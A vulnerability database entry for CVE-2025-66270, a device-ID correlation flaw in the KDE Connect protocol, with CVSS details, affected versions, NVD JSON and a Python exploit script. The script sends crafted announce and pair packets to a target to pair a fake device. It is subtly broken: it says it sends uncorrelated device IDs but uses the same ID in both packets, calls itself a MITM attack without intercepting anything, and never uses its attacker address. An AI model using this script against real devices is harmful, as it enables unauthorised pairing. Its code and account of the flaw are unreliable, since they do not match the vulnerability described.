Security Vulnerability Report
中文
CVE-2025-66270 CVSS 4.7 MEDIUM

CVE-2025-66270

Published: 2025-12-05 06:16:09
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The KDE Connect protocol 8 before 2025-11-28 does not correlate device IDs across two packets. This affects KDE Connect before 25.12 on desktop, KDE Connect before 0.5.4 on iOS, KDE Connect before 1.34.4 on Android, GSConnect before 68, and Valent before 1.0.0.alpha.49.

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

KDE Connect Desktop < 25.12
KDE Connect Android < 1.34.4
KDE Connect iOS < 0.5.4
GSConnect < 68
Valent < 1.0.0.alpha.49
KDE Connect Protocol 8 (before 2025-11-28)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66270 PoC - KDE Connect Device ID Correlation Attack # This PoC demonstrates the device ID correlation vulnerability in KDE Connect Protocol 8 # Attack vector: MITM attack to impersonate a device by not correlating device IDs across packets import socket import struct import json import time class KDEConnectVulnPoC: def __init__(self, target_ip, attacker_ip): self.target_ip = target_ip self.attacker_ip = attacker_ip self.port = 1716 # KDE Connect default port self.protocol_version = 8 def create_device_pair_request(self, fake_device_id, fake_device_name): """Create a malicious pair request without proper device ID correlation""" packet = { "id": int(time.time() * 1000), "type": "pair", "body": { "deviceId": fake_device_id, "deviceName": fake_device_name, "deviceType": "desktop", "protocolVersion": self.protocol_version } } return json.dumps(packet) def create_device_announce_packet(self, fake_device_id): """Create announce packet that doesn't correlate with pair request""" packet = { "id": int(time.time() * 1000), "type": "deviceAnnounce", "body": { "deviceId": fake_device_id, "deviceName": "FakeDevice", "deviceType": "desktop", "protocolVersion": self.protocol_version, "tcpPort": 1716 } } return json.dumps(packet) def exploit(self): """ Exploit the device ID correlation vulnerability: 1. Send announce packet with fake device ID 2. Send pair request with different/uncorrelated device ID 3. Protocol does not verify IDs match across packets """ sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(5) fake_device_id = "AttackerDevice123" fake_device_name = "MaliciousDevice" # Step 1: Send announce packet announce = self.create_device_announce_packet(fake_device_id) sock.sendto(announce.encode(), (self.target_ip, self.port)) print(f"[+] Sent deviceAnnounce packet with deviceId: {fake_device_id}") # Step 2: Send pair request (device ID not correlated with announce) pair_request = self.create_device_pair_request(fake_device_id, fake_device_name) sock.sendto(pair_request.encode(), (self.target_ip, self.port)) print(f"[+] Sent pair request packet") # Step 3: Wait for response (vulnerability allows pairing without proper verification) try: data, addr = sock.recvfrom(4096) response = json.loads(data.decode()) print(f"[+] Received response: {response}") if response.get('type') == 'pair': print("[!] VULNERABLE: Pair request accepted without proper device ID correlation") except socket.timeout: print("[-] No response received") sock.close() return True if __name__ == "__main__": target = "192.168.1.100" attacker = "192.168.1.200" poc = KDEConnectVulnPoC(target, attacker) poc.exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66270", "sourceIdentifier": "[email protected]", "published": "2025-12-05T06:16:09.253", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The KDE Connect protocol 8 before 2025-11-28 does not correlate device IDs across two packets. This affects KDE Connect before 25.12 on desktop, KDE Connect before 0.5.4 on iOS, KDE Connect before 1.34.4 on Android, GSConnect before 68, and Valent before 1.0.0.alpha.49."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-290"}]}], "references": [{"url": "https://github.com/GSConnect/gnome-shell-extension-gsconnect/commit/a38246deec0af50ae218cdc51db32cdd7eb145e3", "source": "[email protected]"}, {"url": "https://github.com/andyholmes/valent/commit/85f773124a67ed1add79e7465bb088ec667cccce", "source": "[email protected]"}, {"url": "https://invent.kde.org/network/kdeconnect-android/-/commit/675d2d24a1eb95d15d9e5bde2b7e2271d5ada6a9", "source": "[email protected]"}, {"url": "https://invent.kde.org/network/kdeconnect-ios/-/commit/6c003c22d04270cabc4b262d399c753d55cf9080", "source": "[email protected]"}, {"url": "https://invent.kde.org/network/kdeconnect-kde/-/commit/4e53bcdd5d4c28bd9fefd114b807ce35d7b3373e", "source": "[email protected]"}, {"url": "https://kde.org/info/security/advisory-20251128-1.txt", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.